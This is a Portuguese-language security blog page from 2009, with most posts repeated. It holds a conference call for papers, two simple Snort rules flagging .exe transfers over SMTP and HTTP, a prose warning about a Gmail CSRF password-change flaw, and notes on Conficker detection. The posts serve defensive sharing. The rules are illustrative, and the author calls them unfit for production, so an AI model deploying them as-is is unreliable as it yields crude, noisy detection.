Rodrigo Montoro(Sp0oKeR)
segunda-feira, 16 de março de 2009
Call for papers: You Shot The Sheriff (YSTS) v3.0
A chamada para submissao de apresentacoes do YSTS 3.0 esta aberta!
A terceira edicao ocorrera em Sao Paulo, em 22 de Junho de 2009
INTRODUCAO
O YSTS e' um evento unico, de alto nivel, com foco na comunidade de seguranca da informacao brasilera, com participacao de palestrantes nacionais e internacionais.
Buscando combinar apresentacoes de alta qualidade, cobrindo os mais diversos topicos relacionados com seguranca da informacao, do nivel mais tecnico ao gerencial.
O objetivo e' permitir que a audiencia compreenda a abrangencia do mundo da seguranca da informacao, que exige entendimento das particularidades dos varios segmentos deste mercado.
Este e' um evento apenas para convidados. Assim sendo, submeter uma palestra e', certamente, um excelente modo de garantir a participacao no evento.
Devido ao sucesso das edicao anteriores, nos mantivemos o mesmo formato:
- - Ambiente confortavel e descontraido
- - O local do YSTS 3.0 sera informado apenas aos convidados
- - Como nas edicoes anteriores, o local secreto sera um bar fechado ou club
- - E sim havera comida e bebida
TOPICOS
Os focos de interesse, para o YSTS 3.0, sao:
* Sistemas Operacionais
* Topicos relacionados com carreira e gestao
* Dispositivos moveis/Sistemas embarcados
* Auditoria e controle
* Web e coisas 2.0
* Politicas para seguranca da informacao
* Telecomunicacao/Redes/Radio frequencias
* Respostas a incidentes e politicas (uteis) relacionadas
* Guerra cibernetica
* Malware/ BotNets
* Concientizacao de usuarios/Problemas em redes sociais
* Programacao segura
* Espacos e comunidades hacker
* Fuzzing
* Seguranca fisica
* Virtualizacao
* Criptografia/Ofuscacao
* Infraestrutura e sistemas criticos
* CAPTCHAS inviolaveis
* E qualquer outro topico relacionado com seguranca que voce imagine relevante para a conferencia
Nos gostamos de palestras curtas, 30 minutos costuma ser suficiente para passar o recado, se voce achar que necessita de mais tempo, faca essa observacao na sua submissao.
REGALIAS AOS PALESTRANTES
* Auxilio para despesas de viagem e hospedagem, para palestrantes fora de Sao Paulo, no valor de R$ 700,00 (Setecentos reais).
* Cafe da manha, almoco e jantar, durante a conferencia
* Festa pos-conferencia
* Auditoria de produto em pizzarias/churrascarias tradicionais
SUBMISSAO
Cada submissao deve incluir as segintes informacoes:
* Nome, titulo, endereco, email e telefone/numero de contato
* resumo biografico e qualificacoes
* Experiencia em apresentacoes
* Sumario e abstrato da sua apresentacao
* Se ja tiver produzido algum material envie tambem (ppt, pdf, etc.)
* Requisitos tecnicos (alem do projetor)
* Outras publicacoes ou conferencia onde este materia foi ou sera publicado/submetido
Nos aceitamos submissoes e apresentacoes em Ingles, Portugues e Espanhol
DATAS IMPORTANTES
Data final para submissoes - 10 de Maio de 2009
Notificacao dos autores aceitos - 20 de Maio de 2009
Envio do material para apresentacoes aceitas - 15 Junho 2009
Por favor envie sua submissao para cfp/at/ysts.org
CONTATO
Informacoes gerais: b0ard/at/ysts.org
Patrocinio: sponsors/at/ysts.org
Esperamos voce!
Site: http://www.ysts.org
A terceira edicao ocorrera em Sao Paulo, em 22 de Junho de 2009
INTRODUCAO
O YSTS e' um evento unico, de alto nivel, com foco na comunidade de seguranca da informacao brasilera, com participacao de palestrantes nacionais e internacionais.
Buscando combinar apresentacoes de alta qualidade, cobrindo os mais diversos topicos relacionados com seguranca da informacao, do nivel mais tecnico ao gerencial.
O objetivo e' permitir que a audiencia compreenda a abrangencia do mundo da seguranca da informacao, que exige entendimento das particularidades dos varios segmentos deste mercado.
Este e' um evento apenas para convidados. Assim sendo, submeter uma palestra e', certamente, um excelente modo de garantir a participacao no evento.
Devido ao sucesso das edicao anteriores, nos mantivemos o mesmo formato:
- - Ambiente confortavel e descontraido
- - O local do YSTS 3.0 sera informado apenas aos convidados
- - Como nas edicoes anteriores, o local secreto sera um bar fechado ou club
- - E sim havera comida e bebida
TOPICOS
Os focos de interesse, para o YSTS 3.0, sao:
* Sistemas Operacionais
* Topicos relacionados com carreira e gestao
* Dispositivos moveis/Sistemas embarcados
* Auditoria e controle
* Web e coisas 2.0
* Politicas para seguranca da informacao
* Telecomunicacao/Redes/Radio frequencias
* Respostas a incidentes e politicas (uteis) relacionadas
* Guerra cibernetica
* Malware/ BotNets
* Concientizacao de usuarios/Problemas em redes sociais
* Programacao segura
* Espacos e comunidades hacker
* Fuzzing
* Seguranca fisica
* Virtualizacao
* Criptografia/Ofuscacao
* Infraestrutura e sistemas criticos
* CAPTCHAS inviolaveis
* E qualquer outro topico relacionado com seguranca que voce imagine relevante para a conferencia
Nos gostamos de palestras curtas, 30 minutos costuma ser suficiente para passar o recado, se voce achar que necessita de mais tempo, faca essa observacao na sua submissao.
REGALIAS AOS PALESTRANTES
* Auxilio para despesas de viagem e hospedagem, para palestrantes fora de Sao Paulo, no valor de R$ 700,00 (Setecentos reais).
* Cafe da manha, almoco e jantar, durante a conferencia
* Festa pos-conferencia
* Auditoria de produto em pizzarias/churrascarias tradicionais
SUBMISSAO
Cada submissao deve incluir as segintes informacoes:
* Nome, titulo, endereco, email e telefone/numero de contato
* resumo biografico e qualificacoes
* Experiencia em apresentacoes
* Sumario e abstrato da sua apresentacao
* Se ja tiver produzido algum material envie tambem (ppt, pdf, etc.)
* Requisitos tecnicos (alem do projetor)
* Outras publicacoes ou conferencia onde este materia foi ou sera publicado/submetido
Nos aceitamos submissoes e apresentacoes em Ingles, Portugues e Espanhol
DATAS IMPORTANTES
Data final para submissoes - 10 de Maio de 2009
Notificacao dos autores aceitos - 20 de Maio de 2009
Envio do material para apresentacoes aceitas - 15 Junho 2009
Por favor envie sua submissao para cfp/at/ysts.org
CONTATO
Informacoes gerais: b0ard/at/ysts.org
Patrocinio: sponsors/at/ysts.org
Esperamos voce!
Site: http://www.ysts.org
quarta-feira, 11 de março de 2009
Pegando binários a partir do pcap
Vi esse post demonstrando facilmente como pegar o binário através do pcap. Com certeza isso é MUITO interessante, até como exemplos podemos criar regras no snort para logar o tráfego de binários exe em portas http por exemplo, para depois fazermos a analise. Logicamente poderiamos fazer isso para outros protocolos, correlacionar com a politica de seguranca, usar da maneira que imaginar .
Por exemplo uma regra BEM simples para tráfego SMTP, não utilizem em ambientes de produção, caso queira podemos refinar num futuro, so mandar e-mail
alert $HOME_NET any -> $SMTP_SERVER 25 (msg:"Arquivo EXE para servidor de e-mail, possivel virus"; sid:100000000; content:".exe";nocase;)
Ou simplemesnte um GET web
alert $ HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Arquivo EXE recebido via GET porta 80";sid:10000000001;uricontent:".exe";nocase;)
Como citei, regras extremamente simples , so para ilustrar as possibilidades =)
O link para o artigo em inglês: "Pulling Binaries from pcap"
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Por exemplo uma regra BEM simples para tráfego SMTP, não utilizem em ambientes de produção, caso queira podemos refinar num futuro, so mandar e-mail
alert $HOME_NET any -> $SMTP_SERVER 25 (msg:"Arquivo EXE para servidor de e-mail, possivel virus"; sid:100000000; content:".exe";nocase;)
Ou simplemesnte um GET web
alert $ HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Arquivo EXE recebido via GET porta 80";sid:10000000001;uricontent:".exe";nocase;)
Como citei, regras extremamente simples , so para ilustrar as possibilidades =)
O link para o artigo em inglês: "Pulling Binaries from pcap"
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
sexta-feira, 6 de março de 2009
Notícias interessantes e links
Estou ministrando um treinamento em um cliente do Rio de Janeiro e a semana está meio corrida, mas algumas coisas intessantes que acompanhei e vi =)
Vídeos Defcon 16 no ar
https://www.defcon.org/podcast/defcon-16-video.rss
Vulnerabilidade CSRF Gmail - round two by N-Stalker Labs
http://community.nstalker.com/csrf-vulnerability-in-gmail-service-round-two
Ferramentas de web bugadas para aprendizados - excelente lista com dezenas de projetos/softwares que simulam sistemas web bugados para estudar web app sec
http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
Lista de Fuzzers
http://www.krakowlabs.com/lof.html
Happy Hacking!
Rodrigo Montoro (Sp0oKeR)
Vídeos Defcon 16 no ar
https://www.defcon.org/podcast/defcon-16-video.rss
Vulnerabilidade CSRF Gmail - round two by N-Stalker Labs
http://community.nstalker.com/csrf-vulnerability-in-gmail-service-round-two
Ferramentas de web bugadas para aprendizados - excelente lista com dezenas de projetos/softwares que simulam sistemas web bugados para estudar web app sec
http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
Lista de Fuzzers
http://www.krakowlabs.com/lof.html
Happy Hacking!
Rodrigo Montoro (Sp0oKeR)
terça-feira, 3 de março de 2009
Cuidado: CSRF vulnerability in GMail service
Caros,
Saiu na fulldisclosure uma falha que chega a ser ridicula no gmail . A falha permite que utilizando CSRF ( Cross Site Request Forgery) voce consiga modificar o password da conta do gmail do usuario que mandar o site com os parametros nele.
Fizemos 2 posts sobre no blog da N-Stalker Labs .
Ingles: http://community.nstalker.com/csrf-vulnerability-in-gmail-service
pt_BR: http://community.nstalker.com/csrf-vulnerability-in-gmail-service-pt_br
* Galera, só pra ficar mais claro problema é um CSRF (Cross Site Request Forgery) que possibilita o Brute Force. O CSRF por si so não faz nada , ele só é o facilitador =)
CUIDADO onde clicam!!!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Saiu na fulldisclosure uma falha que chega a ser ridicula no gmail . A falha permite que utilizando CSRF ( Cross Site Request Forgery) voce consiga modificar o password da conta do gmail do usuario que mandar o site com os parametros nele.
Fizemos 2 posts sobre no blog da N-Stalker Labs .
Ingles: http://community.nstalker.com/
pt_BR: http://community.nstalker.com/
* Galera, só pra ficar mais claro problema é um CSRF (Cross Site Request Forgery) que possibilita o Brute Force. O CSRF por si so não faz nada , ele só é o facilitador =)
CUIDADO onde clicam!!!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
segunda-feira, 2 de março de 2009
ISSA Day Março
Após um perido sem ISSA Days por feriados, em Março o ISSA Day volta com tudo e com duas excelentes palestras e sorteio de um Wii =)
Data: 19 de Março de 2009.
Horário: 19h00 às 22h00
Local: Sonesta São Paulo Ibirapuera
Endereço: Avenida Ibirapuera, 2534 - Moema
Programação
19h00 às 19h15 Apresentação ISSA - Anchises de Paula - Presidente
19h15 às 20h15 "Security Through Whitelisting" - David Thomason
20h15 às 20h45 Coffee Break
20h45 às 22h00 "BOUNCER by CoreTrace" - Apresentação e Demonstração - David Thomason
22h00 às 22h10 Sorteio de um Nintendo Wii somente para os presentes
Para se cadastrar: http://www.clm.com.br/newsletter/Convite_ISSADAY/convite_issaday_2009marco.htm
Vejo vocês por lá!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Data: 19 de Março de 2009.
Horário: 19h00 às 22h00
Local: Sonesta São Paulo Ibirapuera
Endereço: Avenida Ibirapuera, 2534 - Moema
Programação
19h00 às 19h15 Apresentação ISSA - Anchises de Paula - Presidente
19h15 às 20h15 "Security Through Whitelisting" - David Thomason
20h15 às 20h45 Coffee Break
20h45 às 22h00 "BOUNCER by CoreTrace" - Apresentação e Demonstração - David Thomason
22h00 às 22h10 Sorteio de um Nintendo Wii somente para os presentes
Para se cadastrar: http://www.clm.com.br/newsletter/Convite_ISSADAY/convite_issaday_2009marco.htm
Vejo vocês por lá!
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
sexta-feira, 27 de fevereiro de 2009
Novo Pré-Processador dcerpc2 e ruleset / Falso positivos / Conficker
A semanas atrás fizemos (tradução do blog do VRT) o post no snort-br sobre o lançamento do novo pré-processador dcerpc2 no RC do snort 2.8.4 em http://snort.org.br/index.php?option=com_content&task=view&id=76&Itemid=43
Dias após o lançamento do novo modulo no qual uma das caracteristicas sera a melhoria de performance e menor número de regras, o pessoal do VRT da Sourcefire fez o release das novas regras baseado na utilização do novo pré processor.
http://vrt-sourcefire.blogspot.com/2009/02/dcerpc2-ruleset-now-available.html
Interessante que de mais de 5000 regras o novo ruleset possui por volta de algumas dezenas como poderão ver em http://www.snort.org/vrt/tools/dcerpc2-snort-2.8.4-RC-1.rules
Algo que me chamou atenção foi a quantidade de paginas de documentação do dcerpc2, por volta de 14 paginas, o que mostra que esse pre-processador é de suma importancia ser bem configurado, assim como o bom e velho http_inspect. Deem uma olhada no README do mesmo http://www.snort.org/vrt/tools/README.dcerpc2
Reportar Falso positivos ?
O VRT como todo outra equipe no mundo não consegue gerar regras perfeitas para todos ambientes e escreveram ano passado sobre como reportar um Falso Positivo, sendo que assim eles podem fazer o tuning das regras
http://www.snort.org/vrt/falsepos.html
Qual o motivo de citar o Conficker ?
A quantidade de regras geradas pelo conficker, bem como as milhares ja existente fizeram com que a performance dos sensores ficasse totalmente utilizada, sendo que eu acredito que o conficker foi um grande impulso para o novo pre processador.
Como citado, saiu a variante B++ do conficker, e as regras do snort ainda detectam visto que a forma de propagação na rede
Vejam http://vrt-sourcefire.blogspot.com/2009/02/conficker-variant-b-still-detected.html
Sucesso na utlização do novo pré-processor e espero que na sejam infectados com o conficker =)
Happy Snorting!
Rodrigo Montoro (Sp0oKeR)
Dias após o lançamento do novo modulo no qual uma das caracteristicas sera a melhoria de performance e menor número de regras, o pessoal do VRT da Sourcefire fez o release das novas regras baseado na utilização do novo pré processor.
http://vrt-sourcefire.blogspot.com/2009/02/dcerpc2-ruleset-now-available.html
Interessante que de mais de 5000 regras o novo ruleset possui por volta de algumas dezenas como poderão ver em http://www.snort.org/vrt/tools/dcerpc2-snort-2.8.4-RC-1.rules
Algo que me chamou atenção foi a quantidade de paginas de documentação do dcerpc2, por volta de 14 paginas, o que mostra que esse pre-processador é de suma importancia ser bem configurado, assim como o bom e velho http_inspect. Deem uma olhada no README do mesmo http://www.snort.org/vrt/tools/README.dcerpc2
Reportar Falso positivos ?
O VRT como todo outra equipe no mundo não consegue gerar regras perfeitas para todos ambientes e escreveram ano passado sobre como reportar um Falso Positivo, sendo que assim eles podem fazer o tuning das regras
http://www.snort.org/vrt/falsepos.html
Qual o motivo de citar o Conficker ?
A quantidade de regras geradas pelo conficker, bem como as milhares ja existente fizeram com que a performance dos sensores ficasse totalmente utilizada, sendo que eu acredito que o conficker foi um grande impulso para o novo pre processador.
Como citado, saiu a variante B++ do conficker, e as regras do snort ainda detectam visto que a forma de propagação na rede
Vejam http://vrt-sourcefire.blogspot.com/2009/02/conficker-variant-b-still-detected.html
Sucesso na utlização do novo pré-processor e espero que na sejam infectados com o conficker =)
Happy Snorting!
Rodrigo Montoro (Sp0oKeR)
quinta-feira, 26 de fevereiro de 2009
Sp0oKeR Virtual World
english
I'm that kind of guy that love to use all social networking stuff and blogging . If you like and wanna become my friend or follow my stuff extra blog click URL bellow.
Linkedin: http://www.linkedin.com/in/spooker
Twitter Personal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
N-Stalker Research Labs: http://community.nstalker.com/
Snort Brazilian Group: http://www.snort.org.br
Training Company: http://www.dynsec.com.br
Most of my time I'm working and/or having fun on something listed above . I'll post soon my friends blog =)
pt_BR
Sou do tipo de pessoa que adora rede sociais e blogar. Se voce tambem curte, quer me adicionar na sua rede de amigos ou seguir o que faço no dia a dia basta seguir os links abaixo:
Linkedin: http://www.linkedin.com/in/spooker
Twitter Pessoal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
Laboratório de pesquisas da N-Stalker : http://community.nstalker.com/
Grup Usuário Snort Brasil: http://www.snort.org.br
Empresa de Treinamentos: http://www.dynsec.com.br
Maioria do meu tempo estou trabalhando e/ou me divertindo nesses links. Em breve postarei o blog dos meus amigos por aqui.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
I'm that kind of guy that love to use all social networking stuff and blogging . If you like and wanna become my friend or follow my stuff extra blog click URL bellow.
Linkedin: http://www.linkedin.com/in/spooker
Twitter Personal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
N-Stalker Research Labs: http://community.nstalker.com/
Snort Brazilian Group: http://www.snort.org.br
Training Company: http://www.dynsec.com.br
Most of my time I'm working and/or having fun on something listed above . I'll post soon my friends blog =)
pt_BR
Sou do tipo de pessoa que adora rede sociais e blogar. Se voce tambem curte, quer me adicionar na sua rede de amigos ou seguir o que faço no dia a dia basta seguir os links abaixo:
Linkedin: http://www.linkedin.com/in/spooker
Twitter Pessoal: http://www.twitter.com/spookerlabs
Twitter N-Stalker Labs: http://www.twitter.com.br/nstalker
Laboratório de pesquisas da N-Stalker : http://community.nstalker.com/
Grup Usuário Snort Brasil: http://www.snort.org.br
Empresa de Treinamentos: http://www.dynsec.com.br
Maioria do meu tempo estou trabalhando e/ou me divertindo nesses links. Em breve postarei o blog dos meus amigos por aqui.
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
quarta-feira, 25 de fevereiro de 2009
Novo blog / New blog
pt_BR
Após alguns anos utilizando o multiply decidi migrar para o blogspot visto que o multiply estava muito engessado.
Espero contar com os leitores do outro blog (isso se voces existirem eheheh).
Continuem acompanhado e espero postar bastante novidades aqui.
english
After years using multiply I solved to change to blogspot cause multiply was so bad to change stuff and "freedom".
I hope to keep readers from other blog here too (if anyone read that ) .
Keep following my blog and I hope to have news .
Coisas Antigas / Old Stuff - http://spookerlabs.multiply.com
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Após alguns anos utilizando o multiply decidi migrar para o blogspot visto que o multiply estava muito engessado.
Espero contar com os leitores do outro blog (isso se voces existirem eheheh).
Continuem acompanhado e espero postar bastante novidades aqui.
english
After years using multiply I solved to change to blogspot cause multiply was so bad to change stuff and "freedom".
I hope to keep readers from other blog here too (if anyone read that ) .
Keep following my blog and I hope to have news .
Coisas Antigas / Old Stuff - http://spookerlabs.multiply.com
Happy Hacking!
Rodrigo Montoro(Sp0oKeR)
Assinar:
Postagens (Atom)